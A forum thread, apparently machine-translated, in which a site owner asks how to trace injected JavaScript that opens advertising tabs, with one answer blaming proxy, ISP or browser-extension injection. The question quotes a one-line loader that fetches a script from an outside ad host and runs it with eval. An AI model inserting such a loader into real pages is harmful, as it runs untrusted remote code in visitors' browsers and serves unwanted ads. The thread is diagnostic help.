Search for malware on a website

I lost this problem a bit, so please excuse me. I know there are other topics in this, but I cannot find the answer.

On the site, when it loads, it does not matter where the user clicks the button, this is the open add tab in the browser with advertising.

What I could find so far by looking at the browser console is that the js file is uploaded

http://cdn.mecash.ru/js/replace.js 

This file contains

 !function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window); 

and, looking at this tx.js , I suspect that it was introduced by a hacker.

The problem is that I was browsing files on the host and cannot find any inclusions or anything in this js ..

Can someone help me and tell me where or maybe how can I find it?

+6
source share
1 answer

In fact, such files are entered when data is transferred from the server to the client. Your actual dosen't code contains a script, but they are entered and executed on the client machine.

Perhaps introduced:

  • Third-party proxies used by proxies.
  • In some cases, an ISP is implemented.
  • Installed malicious / compromised browser extension.

You can avoid proxy / ISP injection by passing content over https instead of http . However, injections made by browswer extensions can be avoided by removing only the extensions.

+4
source

Source: https://habr.com/ru/post/1012614/


All Articles